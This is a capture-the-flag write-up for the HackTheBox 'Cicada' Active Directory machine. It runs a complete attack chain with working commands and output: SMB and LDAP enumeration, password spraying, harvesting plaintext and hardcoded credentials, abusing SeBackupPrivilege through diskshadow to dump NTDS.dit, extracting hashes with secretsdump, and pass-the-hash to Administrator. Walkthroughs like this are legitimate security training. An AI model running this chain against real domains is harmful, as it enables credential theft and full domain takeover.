Machine Overview
Cicada is an easy-rated Windows Active Directory Domain Controller from HackTheBox. The machine focuses on Active Directory enumeration, credential discovery through exposed SMB shares and LDAP metadata, and privilege escalation via the SeBackupPrivilege privilege. Initial access is gained by discovering default credentials in an HR notice file, enumerating domain users, and finding additional credentials stored in user account descriptions. This leads to accessing SMB shares containing hardcoded credentials in PowerShell scripts. Privilege escalation is achieved by leveraging the SeBackupPrivilege to dump the NTDS.dit database and extract the Administrator's password hash.
Enumeration
Network Scanning
We start by performing a nmap scan to identify open ports and services:
nmap -A -oN cicada.nmap 10.10.11.35Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-15 03:36:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-11-15T03:37:20+00:00; +7h00m04s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-11-15T03:37:20+00:00; +7h00m04s from scanner time.The scan reveals this is a Windows Domain Controller (CICADA-DC.cicada.htb) with typical AD services:
- Port 53: DNS
- Port 88: Kerberos
- Port 135: RPC Endpoint Mapper
- Port 139/445: SMB
- Port 593: RPC over HTTP
- Port 636: LDAPS (LDAP over SSL)
- Port 3268: Global Catalog (LDAP)
SMB Enumeration
We enumerate available SMB shares:
smbclient -NL //10.10.11.35Available Shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server shareThe presence of NETLOGON and SYSVOL shares confirms this is a Domain Controller. We also notice two custom shares: DEV and HR, which may contain interesting information.
Initial Credential Discovery
Since the HR share is accessible without authentication, we explore it to look for any exposed information:
smbclient -N //10.10.11.35/HRContents:
smb: \> dir
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024We download and examine the Notice from HR.txt file:
smb: \> get "Notice from HR.txt"File Contents:
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
<...SNIP...>The HR notice reveals a default password: Cicada$M6Corpb*@Lp#nZp!8. However, we need to identify which user account uses this password.
User Enumeration
We use netexec to perform RID brute-forcing to enumerate domain users:
netexec smb 10.10.11.35 -u "random" -p "" --rid-bruteOutput:
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
<...SNIP...>
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)We extract the discovered usernames and save them to users.txt, then attempt to authenticate with the default password:
netexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'Authentication Results:
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8The credentials work for michael.wrightson! We now have authenticated access to the domain.
LDAP Enumeration
With valid credentials for michael.wrightson, we can dump the Active Directory domain information using ldapdomaindump:
ldapdomaindump 10.10.11.35 -u "CICADA.HTB\michael.wrightson" \
-p 'Cicada$M6Corpb*@Lp#nZp!8'This creates several JSON files containing domain information. We examine domain_users.json to look for any sensitive information. We discover that David Orelious has stored his password in his account description field.
David Orelious Account Details:
{
"attributes": {
<...SNIP...>
"cn": [
"David Orelious"
],
<...SNIP...>
"description": [
"Just in case I forget my password is aRt$Lp#7t*VQ!3"
]
}
<...SNIP...>
}David Orelious has left his password in his account description: aRt$Lp#7t*VQ!3
SMB Share Access
We authenticate to SMB using David's credentials and enumerate share permissions:
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H 10.10.11.35Share Permissions:
[+] IP: 10.10.11.35:445 Name: 10.10.11.35 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV READ ONLY
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server shareDavid has read access to the DEV and HR shares. Let's explore the DEV share:
smbclient -U 'david.orelious%aRt$Lp#7t*VQ!3' //10.10.11.35/DEVContents:
smb: \> dir
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 448026 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (7.7 KiloBytes/sec) (average 7.7 KiloBytes/sec)We download and examine the PowerShell backup script:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"The script contains hardcoded credentials for emily.oscars with the password Q!3@Lp#M6b*7t*Vt.
Initial Access
We use the discovered credentials to authenticate via WinRM:
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'Verification:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscarsPrivilege Escalation
Enumerating User Privileges
We check the current user's privileges and group memberships:
whoami /allKey Findings:
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
<...SNIP...>
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
<...SNIP...>The user emily.oscars is a member of the Backup Operators group and has the SeBackupPrivilege enabled. This privilege allows us to read any file on the system, including the NTDS.dit database file, which contains all domain user password hashes.
Dumping NTDS.dit
According to the Exploit notes - SeBackupPrivilege documentation and Github - SeBackupPrivilege repository, we can use diskshadow to create a shadow copy of the system drive, then copy the NTDS.dit and SYSTEM hive files using the SeBackupPrivilege privilege.
Step 1: Create a script for diskshadow
set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:Step 2: Execute diskshadow
diskshadow.exe /s .\diskshadow.txtStep 3: Upload and Import SeBackupPrivilege DLLs
We need to download the SeBackupPrivilege PowerShell modules from the GitHub repository and upload them to the target:
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dllThese modules provide PowerShell cmdlets that leverage the SeBackupPrivilege to read files that would normally be inaccessible.
Step 4: Copy NTDS.dit and SYSTEM files
Using the imported modules, we can now copy the NTDS.dit file from the shadow copy and save the SYSTEM registry hive:
Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit c:\\programdata\\ntds.dit
reg save HKLM\SYSTEM C:\\programdata\\SYSTEMThen we download both files to our local machine:
download c:\\programdata\\ntds.dit
download c:\\programdata\\SYSTEMStep 5: Extract Hashes Using secretsdump
On our local machine, we use secretsdump to extract password hashes from the downloaded NTDS.dit and SYSTEM files:
secretsdump -ntds ntds.dit -system SYSTEM LOCALOutput:
<...SNIP...>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
<...SNIP...>We successfully extracted the Administrator's NTLM hash: 2b87e7c93a3e8a0ea4a581937016f341
Administrator Access
We use the extracted hash to perform pass-the-hash authentication:
$ evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administratorWe now have a shell running as the Administrator user.
User & Root Flags
- User:
C:\Users\emily.oscars.CICADA\Desktop\user.txt - Root:
C:\Users\Administrator\Desktop\root.txt